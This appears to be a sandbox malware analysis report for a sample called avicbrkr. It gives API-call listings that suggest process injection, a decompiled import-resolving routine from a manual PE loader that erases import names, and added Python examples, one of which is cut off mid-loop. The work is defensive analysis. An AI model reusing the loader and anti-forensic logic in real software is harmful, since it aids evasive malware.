                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$memcpy$Free$Closelstrlen$AllocateCurrentErrorThread$CallHandleLastNamedObjectOpenPipeSectionSingleStatusUnmapViewWaitlstrcatlstrcmpmemsetwsprintf
                      • String ID: R9
                      • API String ID: 2138848589-134138977
                      • Opcode ID: 436b0fff31a82a72872fc6614147d4b79f3bef9b5dcb8a832fed20113d8ba050
                      • Instruction ID: 60505a72faa05e35df0dd3058ac5c04f0110e19c31432b6608c5e707582dd382
                      • Opcode Fuzzy Hash: 436b0fff31a82a72872fc6614147d4b79f3bef9b5dcb8a832fed20113d8ba050
                      • Instruction Fuzzy Hash: 4E711871900609EFDF22EFA4DC45EEEBBB9FF08300F15845AE505A7260E776AA41DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
                        • Part of subcall function 0038939D: GetLocalTime.KERNEL32(?), ref: 003893A7
                        • Part of subcall function 0038939D: wsprintfA.USER32 ref: 003893D3
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037B3E3
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                      • wsprintfA.USER32 ref: 0037B33D
                      • memcpy.NTDLL(00000000,?,?), ref: 0037B382
                      • InterlockedExchange.KERNEL32(0039D22C,00000000), ref: 0037B3A0
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                        • Part of subcall function 00375DC6: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00375DEF
                        • Part of subcall function 00375DC6: memcpy.NTDLL(00000000,?,?), ref: 00375E02
                        • Part of subcall function 00375DC6: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375E13
                        • Part of subcall function 00375DC6: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375E28
                        • Part of subcall function 00375DC6: HeapFree.KERNEL32(00000000,00000000,?), ref: 00375E60
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$memcpy$AllocateFree$CriticalSectionwsprintf$CallEnterErrorExchangeInterlockedLastLeaveLocalNamedPipeTimelstrlen
                      • String ID: u9$u9
                      • API String ID: 899936155-9469851
                      • Opcode ID: 7a4997a7897a2fbf5d76c26e99df6c752df0adcef75fa5bcb2b92fea0454dad7
                      • Instruction ID: ded60f3645c445b4cdbf777c1cbb4dd3de80a7136eae4799ee704383e508292a
                      • Opcode Fuzzy Hash: 7a4997a7897a2fbf5d76c26e99df6c752df0adcef75fa5bcb2b92fea0454dad7
                      • Instruction Fuzzy Hash: C6517E75A00209EFDF22DFA5DC85BAEBBB9EB04344F04846AF805E7251D779D950CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00379F3B
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00379F66
                      • memcpy.NTDLL(00000000,?,?,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379F85
                        • Part of subcall function 00379DC4: memcpy.NTDLL(00000000,00379FA5,00000000,?,?,?,00379FA5,00000000,?,?,8B50F445,0037AE2C), ref: 00379E02
                        • Part of subcall function 00379DC4: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379E88
                        • Part of subcall function 00379DC4: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C), ref: 00379EBF
                        • Part of subcall function 00379DC4: LocalFree.KERNEL32(0037AE2C,?,?,?,?,?,?,?,?,8B50F445,0037AE2C,?,?,?,?,?), ref: 00379ECD
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00379FE6
                      • memcpy.NTDLL(?,00000000,Hp9,00000000,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048), ref: 0037A008
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$Heap$AllocateFree$Local
                      • String ID: Hp9$W
                      • API String ID: 974195196-3938697191
                      • Opcode ID: d68865dc9fcd1dc34f7c5d5edd4bfba6ae436d4b16255b552a8cacf0e2991911
                      • Instruction ID: 6154a857120143b679915e44f59f8bee0f5368b2ceeed2a744b6e5a7e48cc7c6
                      • Opcode Fuzzy Hash: d68865dc9fcd1dc34f7c5d5edd4bfba6ae436d4b16255b552a8cacf0e2991911
                      • Instruction Fuzzy Hash: 11416DB1800209EFDF22DF64CC84AAE7BB9FF48344F14846AF908A7210E7359A549F51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 0038D605
                        • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                        • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                        • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
                        • Part of subcall function 003894A2: RtlNtStatusToDosError.NTDLL(C0000002), ref: 003894CF
                        • Part of subcall function 003894A2: SetLastError.KERNEL32(00000000,?,0038D667,00000000,?,00010007,00000004,?), ref: 003894D6
                      • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 0038D69C
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0038D6AA
                      • SuspendThread.KERNEL32(?), ref: 0038D6C2
                        • Part of subcall function 00389481: RtlNtStatusToDosError.NTDLL(00000000), ref: 00389499
                        • Part of subcall function 0038D484: memset.NTDLL ref: 0038D4B2
                        • Part of subcall function 0038D484: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0038D53C
                        • Part of subcall function 0038D484: WaitForSingleObject.KERNEL32(00000064), ref: 0038D54A
                        • Part of subcall function 0038D484: SuspendThread.KERNEL32(?), ref: 0038D55D
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                      • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 0038D737
                      • ResumeThread.KERNEL32(?), ref: 0038D748
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorThread$ResumeStatusmemcpymemset$CloseHandleLastObjectProcessSingleSuspendWait$OpenSectionUnmapViewWow64
                      • String ID: d
                      • API String ID: 1919866759-2564639436
                      • Opcode ID: 7e6907a4e396c4b58b1c84b30afb0f10c4dbaf921e6025148bc0c22f487b45c5
                      • Instruction ID: 085bc1ea71c638eb1b69d710f09f8108da2c79785b6be75f70d3182163ccc53f
                      • Opcode Fuzzy Hash: 7e6907a4e396c4b58b1c84b30afb0f10c4dbaf921e6025148bc0c22f487b45c5
                      • Instruction Fuzzy Hash: 30419C71008305ABCB23FF20DC45A5EBBE8BF84354F0409AAF999961A0D731DD58CBA2
                      Uniqueness

                      Uniqueness Score: -1,00%
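The API block above (OpenProcess with access mask 0x400, IsWow64Process, Resume/SuspendThread around a 100 ms WaitForSingleObject, NtUnmapViewOfSection in a subcall) is the kind of record an analyst pulls out of a report like this for review. The following Python is an added example, not code from the report or from the analysed sample: it parses the three line shapes this page uses for API entries (direct call, call without an argument list, "Part of subcall function" call), decodes the OpenProcess access mask, and summarises one block. The INJECTION_MARKERS set is an analyst-chosen assumption of this example, not a field the report emits; the sample lines are copied from the block above.

```python
import re
from collections import Counter

# One API line of a Joe Sandbox "APIs" block, in the three shapes seen on this page:
#   • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
#   • memset.NTDLL ref: 0038D605                                    (no argument list)
#   • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,...), ref: 00388777
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# dwDesiredAccess values passed to OpenProcess in this report (0x400 here, 0x40 further down).
PROCESS_ACCESS = {0x0400: "PROCESS_QUERY_INFORMATION", 0x0040: "PROCESS_DUP_HANDLE"}

# Analyst-chosen indicator set (an assumption of this example, not a report field):
# their co-occurrence in one function is what gets the block flagged for review.
INJECTION_MARKERS = {"OpenProcess", "IsWow64Process", "NtUnmapViewOfSection",
                     "SuspendThread", "ResumeThread"}

# Constructed input: lines copied from the API block above, plus a non-API line.
SAMPLE_LINES = """\
• memset.NTDLL ref: 0038D605
  • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
  • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
  • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
• ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 0038D69C
• WaitForSingleObject.KERNEL32(00000064), ref: 0038D6AA
• SuspendThread.KERNEL32(?), ref: 0038D6C2
  • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
• GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 0038D737
• ResumeThread.KERNEL32(?), ref: 0038D748
Strings
""".splitlines()


def parse_calls(lines):
    """Parse API entry lines into dicts; lines that are not API entries are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        calls.append({
            "api": m["api"],
            "mod": m["mod"],
            "args": m["args"].split(",") if m["args"] else [],
            "ref": int(m["ref"], 16),                        # call-site address
            "sub": int(m["sub"], 16) if m["sub"] else None,  # callee when the call is indirect
        })
    return calls


def describe_open_process(call):
    """Decode the dwDesiredAccess argument of an OpenProcess entry ('?' = not recovered)."""
    if call["api"] != "OpenProcess" or not call["args"] or call["args"][0] == "?":
        return None
    mask = int(call["args"][0], 16)
    return PROCESS_ACCESS.get(mask, hex(mask))


def triage(calls):
    """Summarise one function's API block: direct calls in order, subcallees,
    module histogram, indicator hits and decoded OpenProcess access masks."""
    return {
        "direct": [c["api"] for c in calls if c["sub"] is None],
        "subcalls": sorted({c["sub"] for c in calls if c["sub"] is not None}),
        "modules": Counter(c["mod"] for c in calls),
        "injection_markers": sorted({c["api"] for c in calls} & INJECTION_MARKERS),
        "open_process_access": [describe_open_process(c) for c in calls
                                if c["api"] == "OpenProcess"],
    }


if __name__ == "__main__":
    for key, value in triage(parse_calls(SAMPLE_LINES)).items():
        print(f"{key}: {value}")
```

The regex assumes argument lists never contain a closing parenthesis, which holds for every entry on this page; `ref` gives the call site inside the dumped module, `sub` the function it was observed in when the call is indirect.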

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00373B60
                        • Part of subcall function 00389EF2: RegCloseKey.ADVAPI32(?,00000000), ref: 00389F79
                        • Part of subcall function 00389B2D: lstrlenW.KERNEL32(?,00000000,?,.dll,00372C36,?,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00389B3B
                        • Part of subcall function 00389B2D: lstrlen.KERNEL32(DllRegisterServer,?,L"7), ref: 00389B49
                        • Part of subcall function 00389B2D: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00389B5E
                        • Part of subcall function 003897B0: lstrlenW.KERNEL32(?,00000000,0039CCC8,?,?,?,00371788,00000000,?,003717F7,?,?,?,?,00000000), ref: 003897BC
                        • Part of subcall function 003897B0: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,00371788,00000000,?,003717F7,?,?,?,?,00000000), ref: 003897E4
                        • Part of subcall function 003897B0: memset.NTDLL ref: 003897F6
                        • Part of subcall function 00372A11: RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00372A2B
                        • Part of subcall function 00372A11: lstrcmpiW.KERNEL32(00001000,?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A61
                        • Part of subcall function 00372A11: lstrlenW.KERNEL32(?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A6E
                        • Part of subcall function 00372A11: RegCloseKey.ADVAPI32(?,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372AC4
                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00373C47
                      • GetLastError.KERNEL32 ref: 00373C52
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00373C67
                      • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00373C78
                        • Part of subcall function 00372AD3: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00372AEC
                        • Part of subcall function 00372AD3: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00372B8E,?), ref: 00372B1A
                        • Part of subcall function 00372AD3: lstrlenW.KERNEL32(00000000,?,?,00372B8E,?), ref: 00372B26
                        • Part of subcall function 00372AD3: HeapFree.KERNEL32(00000000,00000000), ref: 00372B3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlen$Heap$Close$AllocateCreateFreeOpen$DirectoryErrorFileLastlstrcmpimemcpymemset
                      • String ID: .dll$.exe
                      • API String ID: 719682790-724907077
                      • Opcode ID: 90c705c47436e6a09f5657cfc82a1491957e58f4b2ea7220034046f8dbd8fa83
                      • Instruction ID: b1f2538a55b1d1aa325e784a1eecac8a1250e80cb00d7c909d829362525574fe
                      • Opcode Fuzzy Hash: 90c705c47436e6a09f5657cfc82a1491957e58f4b2ea7220034046f8dbd8fa83
                      • Instruction Fuzzy Hash: 72317E7290021AFBDB23ABA5DD4AEAF7B7CEF44740F104056F509F2160DB359A00EB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlImageNtHeader.NTDLL(00000094), ref: 00372B6E
                        • Part of subcall function 00372AD3: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00372AEC
                        • Part of subcall function 00372AD3: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00372B8E,?), ref: 00372B1A
                        • Part of subcall function 00372AD3: lstrlenW.KERNEL32(00000000,?,?,00372B8E,?), ref: 00372B26
                        • Part of subcall function 00372AD3: HeapFree.KERNEL32(00000000,00000000), ref: 00372B3E
                      • CloseHandle.KERNEL32(0039D198), ref: 00372BB7
                        • Part of subcall function 00372998: lstrcatW.KERNEL32(?,?), ref: 003729AA
                        • Part of subcall function 00372998: WaitForSingleObject.KERNEL32(00002710,?), ref: 003729CD
                        • Part of subcall function 00372998: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003729EF
                        • Part of subcall function 00372998: GetLastError.KERNEL32(?,00372BDD,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372A03
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00372C5E
                        • Part of subcall function 00389B2D: lstrlenW.KERNEL32(?,00000000,?,.dll,00372C36,?,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00389B3B
                        • Part of subcall function 00389B2D: lstrlen.KERNEL32(DllRegisterServer,?,L"7), ref: 00389B49
                        • Part of subcall function 00389B2D: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00389B5E
                        • Part of subcall function 00389AE6: HeapFree.KERNEL32(00000000,?,?), ref: 00389B16
                      • HeapFree.KERNEL32(00000000,?,.dll), ref: 00372C6D
                        • Part of subcall function 00372A11: RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00372A2B
                        • Part of subcall function 00372A11: lstrcmpiW.KERNEL32(00001000,?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A61
                        • Part of subcall function 00372A11: lstrlenW.KERNEL32(?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A6E
                        • Part of subcall function 00372A11: RegCloseKey.ADVAPI32(?,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372AC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Freelstrlen$AllocateCloseCreate$DirectoryErrorFileHandleHeaderImageLastObjectOpenSingleWaitlstrcatlstrcmpi
                      • String ID: .dll$.exe$L"7
                      • API String ID: 1002432479-3921587787
                      • Opcode ID: 701c3d8e9572648ce18a6eb5d4373fdfbfbe493598801df4fdb0a15ba2b0b77f
                      • Instruction ID: 2458eab3cdc30f01434eaf51136d9efb99e7f788a3e4f67fbac879b96f58d0bb
                      • Opcode Fuzzy Hash: 701c3d8e9572648ce18a6eb5d4373fdfbfbe493598801df4fdb0a15ba2b0b77f
                      • Instruction Fuzzy Hash: C531D076600609BBDB339BA4DD81BAF77BDEB54780F118026FA099B260EB75CE00C750
                      Uniqueness

                      Uniqueness Score: -1,00%

C-Code - Quality: 100%
/* Import resolver for a manually mapped PE32 image (decompiler output; comments added).
 *   __edi : base address of the mapped image
 *   _a4   : pointer to its IMAGE_NT_HEADERS32
 * Header offsets used below (standard PE32 layout):
 *   _a4 + 0x80   OptionalHeader.DataDirectory[IMPORT].VirtualAddress
 *   _a4 + 0x50   OptionalHeader.SizeOfImage
 *   desc + 0x00  IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk (INT)
 *   desc + 0x0c  IMAGE_IMPORT_DESCRIPTOR.Name
 *   desc + 0x10  IMAGE_IMPORT_DESCRIPTOR.FirstThunk (IAT)
 *   desc + 0x14  next descriptor (sizeof IMAGE_IMPORT_DESCRIPTOR); +0x20 is its Name
 *   name + 2     IMAGE_IMPORT_BY_NAME.Name, after the 16-bit Hint
 * Returns 0 on success, 0x7e (ERROR_MOD_NOT_FOUND) when LoadLibraryA fails and
 * 0x7f (ERROR_PROC_NOT_FOUND) when GetProcAddress fails. Every DLL and function
 * name is overwritten with zeros once resolved, so the import strings are gone
 * from the image by the time memory is dumped. */
E00401398(void* __edi, intOrPtr _a4) {
	_Unknown_base(*)()* _v4;        /* resolved procedure address */
	intOrPtr _v8;                   /* IAT minus INT distance: IAT slot = INT slot + _v8 */
	struct HINSTANCE__* _v12;       /* module handle returned by LoadLibraryA */
	signed int _v16;                /* return code */
	intOrPtr _t11;                  /* name pointer + 2 (skips the Hint word) */
	intOrPtr _t23;
	struct HINSTANCE__* _t24;
	intOrPtr _t27;
	intOrPtr _t28;
	_Unknown_base(*)()* _t29;
	intOrPtr _t33;
	intOrPtr* _t34;
	intOrPtr _t35;
	void* _t42;
	CHAR* _t44;
	intOrPtr* _t46;
	CHAR* _t49;
	signed int* _t50;
	intOrPtr _t57;

	_t42 = __edi;                                       /* image base */
	_t50 =  &_v16;
	_v16 = _v16 & 0x00000000;                           /* status = 0 */
	_t33 =  *((intOrPtr*)(_a4 + 0x80));                 /* import directory RVA */
	if(_t33 == 0) {
		L23:
		return _v16;
	}
	_t34 = _t33 + __edi;                                /* first IMAGE_IMPORT_DESCRIPTOR */
	_t23 =  *((intOrPtr*)(_t34 + 0xc));                 /* descriptor.Name RVA */
	if(_t23 == 0) {
		goto L23;
	}
	while(1) {
		_t44 = _t23 + _t42;                             /* DLL name */
		_t24 = LoadLibraryA(_t44);
		_v12 = _t24;
		if(_t24 == 0) {
			break;                                      /* -> 0x7e below */
		}
		memset(_t44, 0, lstrlenA(_t44));                /* wipe the DLL name */
		_t27 =  *_t34;                                  /* OriginalFirstThunk (INT) */
		_t35 =  *((intOrPtr*)(_t34 + 0x10));            /* FirstThunk (IAT) */
		_t50 =  &(_t50[3]);
		if(_t27 != 0) {
			L6:
			_t46 = _t27 + _t42;                         /* current lookup entry */
			_t28 =  *_t46;
			if(_t28 == 0) {
				L19:
				_t23 =  *((intOrPtr*)(_t34 + 0x20));    /* next descriptor's Name */
				_t34 = _t34 + 0x14;
				if(_t23 != 0) {
					continue;
				}
				L22:
				goto L23;
			}
			_v8 = _t35 - _t46 + _t42;                   /* IAT slot for this entry = _v8 + _t46 */
			_t57 = _t28;
			L8:
			if(_t57 < 0) {                              /* high bit set: IMAGE_ORDINAL_FLAG32 */
				/* ordinal path as recovered by the decompiler: values outside
				 * [base, base + SizeOfImage) are discarded */
				if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
					_t28 = 0;
				}
			} else {
				_t28 = _t28 + _t42;                     /* IMAGE_IMPORT_BY_NAME */
			}
			_t11 = _t28 + 2; // 0x2                      /* skip the Hint, point at Name */
			_t49 = _t11;
			_t29 = GetProcAddress(_v12, _t49);
			_v4 = _t29;
			if(_t29 == 0) {
				goto L18;                               /* -> 0x7f */
			}
			if(_t49 >= 0) {                             /* a name pointer, not an ordinal */
				memset(_t49, 0, lstrlenA(_t49));        /* wipe the function name */
				_t50 =  &(_t50[3]);
			}
			 *(_v8 + _t46) = _v4;                       /* write the IAT entry */
			_t46 = _t46 + 4;
			_t28 =  *_t46;
			if(_t28 != 0) {
				goto L8;
			} else {
				goto L19;
			}
			L18:
			_v16 = 0x7f;                                /* ERROR_PROC_NOT_FOUND; continue with the next DLL */
			goto L19;
		}
		_t27 = _t35;                                    /* no INT: walk the IAT itself */
		if(_t35 == 0) {
			goto L19;
		}
		goto L6;
	}
	_v16 = 0x7e;                                        /* ERROR_MOD_NOT_FOUND */
	goto L22;
}
Instruction addresses for the listing above (a per-line side column in the original report): the function occupies 0x00401398 to 0x00401492.

                      APIs
                      • LoadLibraryA.KERNEL32(?), ref: 004013C5
                      • lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                      • memset.NTDLL ref: 004013E2
                      • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                      • lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                      • memset.NTDLL ref: 0040144A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlenmemset$AddressLibraryLoadProc
                      • String ID: ~
                      • API String ID: 1986585659-1707062198
                      • Opcode ID: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction ID: 9cfa27cb60d09a088f87bbc70088036487facf95daeb84733a0c8259cf0c0f36
                      • Opcode Fuzzy Hash: 7137cf6fc4849f07640f0138802fdcf82f6608b0a35124494955186490b9465b
                      • Instruction Fuzzy Hash: 2E3158716043028BD7149F19DD80B6B77E8AF44388F14043EED81EB3B2E778E8048B6A
                      Uniqueness

                      Uniqueness Score: -1,00%
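E00401398 is the import fix-up step of a manual PE loader: it walks the import directory through fixed header offsets, binds each IAT entry, and erases the import strings as it goes. The following Python is an added example and is neither code from the report nor from the analysed sample. It builds a constructed PE32-shaped image (one kernel32.dll descriptor with one import by name and one by ordinal) and resolves it with the same offsets the decompiled routine uses (nt+0x80, nt+0x50, descriptor +0x0c/+0x10, stride 0x14, name+2), including the name wiping and the two error codes. A dictionary stands in for LoadLibraryA/GetProcAddress so it runs offline; the ordinal handling (low 16 bits of a flagged thunk) follows the PE specification because the decompiled ordinal branch is not fully recovered.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
ERROR_MOD_NOT_FOUND = 0x7E   # 126: what E00401398 returns when LoadLibraryA fails
ERROR_PROC_NOT_FOUND = 0x7F  # 127: returned when GetProcAddress fails


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def cstr_end(buf, off):
    """Offset of the terminating NUL of the C string at off (what lstrlenA measures)."""
    return buf.index(b"\0", off)


def wipe(buf, off):
    """memset(s, 0, lstrlenA(s)): zero the characters, keep the terminator."""
    end = cstr_end(buf, off)
    buf[off:end] = bytes(end - off)


def build_sample_image():
    """Constructed PE32-shaped image (test data, not a real binary): one import
    descriptor for kernel32.dll with one import by name and one by ordinal.
    Offsets are RVAs; the image base is treated as 0."""
    img = bytearray(0x2000)
    nt = 0x80
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, nt)                  # e_lfanew
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<H", img, nt + 0x18, 0x10B)           # OptionalHeader.Magic (PE32)
    struct.pack_into("<I", img, nt + 0x50, len(img))        # OptionalHeader.SizeOfImage
    struct.pack_into("<II", img, nt + 0x80, 0x1000, 0x28)   # DataDirectory[IMPORT] {RVA, Size}
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    struct.pack_into("<IIIII", img, 0x1000, 0x1100, 0, 0, 0x1200, 0x1300)
    img[0x1200:0x120D] = b"kernel32.dll\0"
    struct.pack_into("<H", img, 0x1210, 0x0123)             # IMAGE_IMPORT_BY_NAME.Hint
    img[0x1212:0x121F] = b"LoadLibraryA\0"
    thunks = (0x1210, IMAGE_ORDINAL_FLAG32 | 42, 0)
    struct.pack_into("<III", img, 0x1100, *thunks)          # INT (lookup table)
    struct.pack_into("<III", img, 0x1300, *thunks)          # IAT, still unbound
    return img, nt


def resolve_imports(img, nt, exports):
    """Bind the IAT with the offsets E00401398 uses: nt+0x80 import directory,
    nt+0x50 SizeOfImage, descriptor +0x0c Name / +0x10 FirstThunk, stride 0x14,
    name pointer +2 to skip the Hint. `exports` ({dll: {name_or_ordinal: addr}})
    stands in for LoadLibraryA/GetProcAddress so this runs offline."""
    import_rva = u32(img, nt + 0x80)
    size_of_image = u32(img, nt + 0x50)
    status, desc = 0, import_rva
    while import_rva and u32(img, desc + 0x0C):
        name_rva = u32(img, desc + 0x0C)
        dll = img[name_rva:cstr_end(img, name_rva)].decode("ascii").lower()
        table = exports.get(dll)
        if table is None:
            return ERROR_MOD_NOT_FOUND                  # LoadLibraryA failed: abort
        wipe(img, name_rva)                             # erase the DLL name in memory
        iat = u32(img, desc + 0x10)
        lookup = u32(img, desc) or iat                  # INT, or the IAT itself if there is none
        i = 0
        while True:
            thunk = u32(img, lookup + i)
            if thunk == 0:
                break
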